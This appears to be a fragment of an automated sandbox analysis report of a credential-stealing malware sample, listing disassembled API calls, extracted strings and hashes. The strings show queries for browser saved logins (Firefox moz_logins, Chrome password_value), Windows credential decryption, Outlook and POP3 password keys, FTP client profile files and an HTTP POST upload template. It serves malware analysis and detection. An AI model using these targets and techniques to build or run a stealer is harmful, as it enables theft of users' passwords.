                  • Opcode ID: b7e6baf17d649584fdb3284207b5bdafa7e77f212842a5f650daf4770349843c
                  • Instruction ID: 45124a1cf859253c60886c047de56744a914881e8d618bb026ac90a7441d8925
                  • Opcode Fuzzy Hash: b7e6baf17d649584fdb3284207b5bdafa7e77f212842a5f650daf4770349843c
                  • Instruction Fuzzy Hash: EF113A75A00218EFDF118F94DC84BDEBB74FB84365F408466FA21662D0C378AA40CF49
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  • API ID:
                  • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                  • API String ID: 0-1526611526
                  • Opcode ID: 8447a2f3be24acdddd1e7d144ae2769daa54ac47adb5ad1513ca8b17ddf358dc
                  • Instruction ID: 7fa1ede78399e99b9ebe2e72336c75a1aab04fbbc9805ac4238bf08c9b51bc50
                  • Opcode Fuzzy Hash: 8447a2f3be24acdddd1e7d144ae2769daa54ac47adb5ad1513ca8b17ddf358dc
                  • Instruction Fuzzy Hash: AD911571910209EADF11AFA1CC46BEEBEB5AF54308F20443BF411722E2DBBD4D919B59
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                  • API String ID: 0-3560805513
                  • Opcode ID: d40c54777c441f4229944022fd1fe6a18eb256e2891277ed7e67e33702fd8e77
                  • Instruction ID: eb23a70922911dd94bec3e51da5842b199223d65ec57f699d029be6d08479b9e
                  • Opcode Fuzzy Hash: d40c54777c441f4229944022fd1fe6a18eb256e2891277ed7e67e33702fd8e77
                  • Instruction Fuzzy Hash: BD512970900109BADF11AFA1CD06AEE7F75AB58349F10843BB411B01E3D7BD8EA1AA5D
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • wsprintfA.USER32 ref: 0040ACAA
                  • wsprintfA.USER32 ref: 0040ACBD
                  • wsprintfA.USER32 ref: 0040ACD0
                  • wsprintfA.USER32 ref: 0040ACE3
                  • wsprintfA.USER32 ref: 0040ACF6
                  • wsprintfA.USER32 ref: 0040AD09
                  • wsprintfA.USER32 ref: 0040AD1C
                    • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                    • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                    • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                  • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                  • API String ID: 3846021373-1012938452
                  • Opcode ID: 2519a298067e9783dec0646fb6d7badb70df905e626c99b58e293020547ea991
                  • Instruction ID: 81a7154d9f2e3192bbe3b7d18b47f02929d6a0aca95bbcff7d33a99a4b22bd81
                  • Opcode Fuzzy Hash: 2519a298067e9783dec0646fb6d7badb70df905e626c99b58e293020547ea991
                  • Instruction Fuzzy Hash: 1F61C532840208BAEF027FA1DC42EEDBB72BF04345F14853AF914741B1D77A5AA4EB59
                  APIs
                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                    • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                  • lstrcmpiA.KERNEL32(?,identification), ref: 0040F60E
                  • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F623
                  • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                  • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                  • lstrcmpiA.KERNEL32(?,identities), ref: 0040F684
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpi$ByteCharMultiWide
                  • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                  • API String ID: 2818632708-4287852900
                  • Opcode ID: 46954f5b077a3dfa9a17dc33f4d33fca0ec5392fd2194f51de6a880c558c7073
                  • Instruction ID: 32c20b9bd6a285d89c9aa568a9db40aa56d369e7289a9a407497ecae3c86032a
                  • Opcode Fuzzy Hash: 46954f5b077a3dfa9a17dc33f4d33fca0ec5392fd2194f51de6a880c558c7073
                  • Instruction Fuzzy Hash: 28416F7180021DABEF219F50CD41FDA7B79BF05304F0045B6B604751E1DB799AE99F98
                  APIs
                  • StrStrIA.SHLWAPI(?,explorer.exe), ref: 00402D7B
                  • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe), ref: 00402D9F
                  • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                  • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                  • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                  • CloseHandle.KERNEL32(?), ref: 00402E34
                  • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                  • CloseHandle.KERNEL32(?), ref: 00402E46
                  • Process32Next.KERNEL32(?,00000128), ref: 00402E58
                  • CloseHandle.KERNEL32(?), ref: 00402E68
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                  • String ID: explorer.exe
                  • API String ID: 3144406365-3187896405
                  • Opcode ID: fc796b8a3d22a4ea1dc248bac3309cee6a96ccfa98b65722c03fef052a418923
                  • Instruction ID: e9f5f745be509d9dcf1df6bba715be1a6a0849aa2247a233fc918bc4ba82b5eb
                  • Opcode Fuzzy Hash: fc796b8a3d22a4ea1dc248bac3309cee6a96ccfa98b65722c03fef052a418923
                  • Instruction Fuzzy Hash: BE210031A50118AADF219B61DD49BEEB7B4AB08344F1044B6E209B11E0DBB89F85DF99
                  APIs
                    • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                  • StrStrIA.SHLWAPI(?,004164BB), ref: 0040BA50
                  • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpilstrlen
                  • String ID: CONSTRAINT$origin_url$password_value$username_value
                  • API String ID: 3649823140-2401479949
                  • Opcode ID: 12214d783ff5d567bc1ec32ecb2231f9776f49af898319369f998b69f80e5026
                  • Instruction ID: 828ab2d763eb7cd0177f349250a9170fbaa97ab777379c78cb920ae62136411c
                  • Opcode Fuzzy Hash: 12214d783ff5d567bc1ec32ecb2231f9776f49af898319369f998b69f80e5026
                  • Instruction Fuzzy Hash: 89113D76300109BADF216A25EC029DE3F91EB51398B008136F855A41E2E7FDC9E1AA9C
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                  • wsprintfA.USER32 ref: 00403EEE
                  • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                  • closesocket.WS2_32(?), ref: 00403F64
                  Strings
                  • <, xrefs: 00403EA3
                  • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 4072649068-2005047030
                  • Opcode ID: 869221f094870a76bc170feb6c88f5b7edf58946339f30f57cd7e09e20171a11
                  • Instruction ID: 93fb31511f3c83f5c313d9664fe0d2adf6ddb800077f286839c43cfcfe5c6ff3
                  • Opcode Fuzzy Hash: 869221f094870a76bc170feb6c88f5b7edf58946339f30f57cd7e09e20171a11
                  • Instruction Fuzzy Hash: BF41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10403AF510B52A1D7B95A55DB19
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: IsRelative$Path$Profile$profiles.ini
                  • API String ID: 0-4107377610
                  • Opcode ID: e39d3af07d84ec044e21e377f8e650803fea04e58434d95e65791fa9d5e176d3
                  • Instruction ID: 4dbcadc1619a9706d489fe659427113ee9d3f87f8c14865decc9af53c423ac16
                  • Opcode Fuzzy Hash: e39d3af07d84ec044e21e377f8e650803fea04e58434d95e65791fa9d5e176d3
                  • Instruction Fuzzy Hash: 15413D31A00146BADF227BA1DC02EAE7F72AF51354F14857BB510741F2DBBD9E90AB09
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                  • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CurrentHandleModuleProcess
                  • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                  • API String ID: 977827838-3073145729
                  • Opcode ID: e1b920541c9229e0638caa801859ebc3f112c8c4ad0cc267b262cb0da077447c
                  • Instruction ID: c3550a283bbffe0b95a980ca9f34ad72dcd434ffdf089d204d5dcc3367299639
                  • Opcode Fuzzy Hash: e1b920541c9229e0638caa801859ebc3f112c8c4ad0cc267b262cb0da077447c
                  • Instruction Fuzzy Hash: 8DF054B271020466C710B2B96C45BDF269887C03A9F290A77F105F22C1E9FCDD858278
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <setting name="$value="
                  • API String ID: 0-3468128162
                  • Opcode ID: 91a259b221128b41385dd14aff69d6b40571917ad41be014f69d9e228e269f48
                  • Instruction ID: d8e6478b80cb4aa323a0f1ef7dcf88da86faea970d0efa92e7622961ce03b881
                  • Opcode Fuzzy Hash: 91a259b221128b41385dd14aff69d6b40571917ad41be014f69d9e228e269f48
                  • Instruction Fuzzy Hash: 78319272D0425A9ECF11BBE18C41AEEBFB19F15314F1440BBE440B2291D7B84E45D7AD
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
                  • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
                  • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040203F
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402054
                  • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402063
                  • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040206A
                  • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                  • String ID:
                  • API String ID: 3150701006-0
                  • Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                  • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                  • Opcode Fuzzy Hash: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                  • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ftp://$http://$https://
                  • API String ID: 0-2804853444
                  • Opcode ID: 74e2403431151642e0b42474d48d15e98af3cab691b3d043a5ca587e0513b932
                  • Instruction ID: e89b673faafa54c7238fd0be839d226a3d8478c5231bebd31a99dfac202c58f0
                  • Opcode Fuzzy Hash: 74e2403431151642e0b42474d48d15e98af3cab691b3d043a5ca587e0513b932
                  • Instruction Fuzzy Hash: 1F610872800109FEDF11AF91CD45AEEBBB9EF04348F10807BB841B51A1DB798B95DB98
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "/>$winex="
                  • API String ID: 0-1498080979
                  • Opcode ID: 95366604600c8e15dfa013a5a2604b337b223ea72c69a09753fbf574a1143f3c
                  • Instruction ID: 7cc38a76399661454f9fed8d13c29c2c9e33c78ddd19b9e5c2cb9053d3d96bf7
                  • Opcode Fuzzy Hash: 95366604600c8e15dfa013a5a2604b337b223ea72c69a09753fbf574a1143f3c
                  • Instruction Fuzzy Hash: 15313D3290401ABEDF12AFA2CC02DEE7E76AF44344F10483BF501B51B1D7794A61EB99
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,FTPCON), ref: 0040819B
                  • StrStrIA.SHLWAPI(00D33330,FTP CONTROL,00000000,00D36918,FTPCON), ref: 004081A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                  • API String ID: 0-2908215140
                  • Opcode ID: 6c4d59e4a0a35497f8836009f8fe87b60cefb34a10a5be8cc295110e275bf344
                  • Instruction ID: fc0db2b52977a28aa23f0be5b734c0375cfb0fc6bea7469442c9d19bb68c55c0
                  • Opcode Fuzzy Hash: 6c4d59e4a0a35497f8836009f8fe87b60cefb34a10a5be8cc295110e275bf344
                  • Instruction Fuzzy Hash: A201D670600205BADB117A258D01FDF7E19DF81314F34413BB985751D2EE7C5A8282EC
                  APIs
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  • lstrlen.KERNEL32(?), ref: 0040243F
                  • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                  • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                  • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: .exe
                  • API String ID: 2414487701-4119554291
                  • Opcode ID: fa324bc166251441f3c767436827a14cf7c088f0ab5bc713754fc440ea09f082
                  • Instruction ID: e588ee8f1b3627a42a1d0e2e0e88280e9b13f327ccc7d4343294799c22d31f0d
                  • Opcode Fuzzy Hash: fa324bc166251441f3c767436827a14cf7c088f0ab5bc713754fc440ea09f082
                  • Instruction Fuzzy Hash: FDF0C83120429269DB3132268C09F6F6F859B92744F140037F540B72D3D7FC989297BE
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <POP3_Password2
                  • API String ID: 0-2923094552
                  • Opcode ID: c9db80333b9d8693281438b5e816e98cfae9730b84fee1fced08ef21377605c4
                  • Instruction ID: 117429db392a8dff71ae317fff0a5dd8b416180247b928e825f6f7dcda499f68
                  • Opcode Fuzzy Hash: c9db80333b9d8693281438b5e816e98cfae9730b84fee1fced08ef21377605c4
                  • Instruction Fuzzy Hash: F3416031D00019AEDF126BA2DC01CEEBE76EF58354B144837F501B61A1D77A4A61EBA9
                  APIs
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                  • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                  • String ID:
                  • API String ID: 1890766102-0
                  • Opcode ID: 417bf511cc47e1740702e06a000a3ccebe7292047eef02df589188c2c827b1fa
                  • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                  • Opcode Fuzzy Hash: 417bf511cc47e1740702e06a000a3ccebe7292047eef02df589188c2c827b1fa
                  • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                  APIs
                  • StrStrIA.SHLWAPI(00D33330,FTP Navigator), ref: 00405BEE
                  • StrStrIA.SHLWAPI(00D33330,FTP Commander,00D33330,FTP Navigator), ref: 00405C1C
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: FTP Commander$FTP Navigator$ftplist.txt
                  • API String ID: 1884169789-2424314702
                  • Opcode ID: 78eea96c85ce5b10c3fbc50c725c790910efced89a8a216ce089480967cc70c8
                  • Instruction ID: 0320ffd316df927a0efd926faa4204048ffcf42f712ae02ca79a5731921818e2
                  • Opcode Fuzzy Hash: 78eea96c85ce5b10c3fbc50c725c790910efced89a8a216ce089480967cc70c8
                  • Instruction Fuzzy Hash: 5D01C870504510B9EB1276228C02FEF7E5ADB81354F24453BB840751E6D77C5BC29AAC
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,FTPNow), ref: 0040D017
                  • StrStrIA.SHLWAPI(00D36918,FTP Now,00D36918,FTPNow), ref: 0040D028
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FTP Now$FTPNow$sites.xml
                  • API String ID: 0-284577462
                  • Opcode ID: 3eca2f1ee8255ce881a856c935d0a5ff55966a413693686c6d0254ccb6705832
                  • Instruction ID: 9ac50745644adb25db173f01573f115ed7c2f664e3b6313370bf1ebd0551913d
                  • Opcode Fuzzy Hash: 3eca2f1ee8255ce881a856c935d0a5ff55966a413693686c6d0254ccb6705832
                  • Instruction Fuzzy Hash: 38F08670900101B5DB213A758C42FAF7A559B8175CF14013BB918B11E6D6BDCAC6926D
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401E19
                  • lstrlen.KERNEL32(00000000,?), ref: 00401E23
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: AHA
                  • API String ID: 2414487701-3076688622
                  • Opcode ID: 8b71fd94be391c9da2ad78ec7c6fd034545c5821bd2ecc25d06e0cfb578feca0
                  • Instruction ID: e8b6ae58985bcf3d9347890230853402862c47fd0fba66da3f713a940b2c391b
                  • Opcode Fuzzy Hash: 8b71fd94be391c9da2ad78ec7c6fd034545c5821bd2ecc25d06e0cfb578feca0
                  • Instruction Fuzzy Hash: D9F01C75200208BFDF017F62CC85A9D3B9AAB5035CF00D52AB90519152E7BD89E48B58
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                  • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$OpenStorage
                  • String ID: Settings
                  • API String ID: 2489594185-473154195
                  • Opcode ID: ef96ca91c8f27b0f0742eb89e84b0124d34e54d5bf3fdb2680921541f42774b0
                  • Instruction ID: b220449be4f11014668baed62f477efadcf711df6315186e1d65e6fb7baf8efc
                  • Opcode Fuzzy Hash: ef96ca91c8f27b0f0742eb89e84b0124d34e54d5bf3fdb2680921541f42774b0
                  • Instruction Fuzzy Hash: E231CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B610791F1D7759A50AB58
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 00401A55
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GlobalUnWire.KERNEL32(?), ref: 00401A7D
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: GlobalLocal$AllocFreeWirelstrlen
                  • String ID: CRYPTED0YUI1.0
                  • API String ID: 165658394-1217275205
                  • Opcode ID: de68d6e1315197927577642856d0d1e9ecb02aaa808b22b6a5956b7194fcc653
                  • Instruction ID: 5516b763cc08dca7c43a7b98d07d229009a7bc976859522b8417ba9aece18d00
                  • Opcode Fuzzy Hash: de68d6e1315197927577642856d0d1e9ecb02aaa808b22b6a5956b7194fcc653
                  • Instruction Fuzzy Hash: 1D118671D00109BEDF026FE1CC429DD7F7AEF44348F008076B915B51B2D77A8AA5AB58
                  APIs
                  • GlobalFix.KERNEL32(?), ref: 0040FB5A
                  • GlobalUnWire.KERNEL32(?), ref: 0040FB72
                  • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$Wire
                  • String ID: STATUS-IMPORT-OK
                  • API String ID: 427882606-1591331578
                  • Opcode ID: 3bd0028bd82ac8d0a8d851e1d04e875ce27c06409241a217d3b9dc50780aeffa
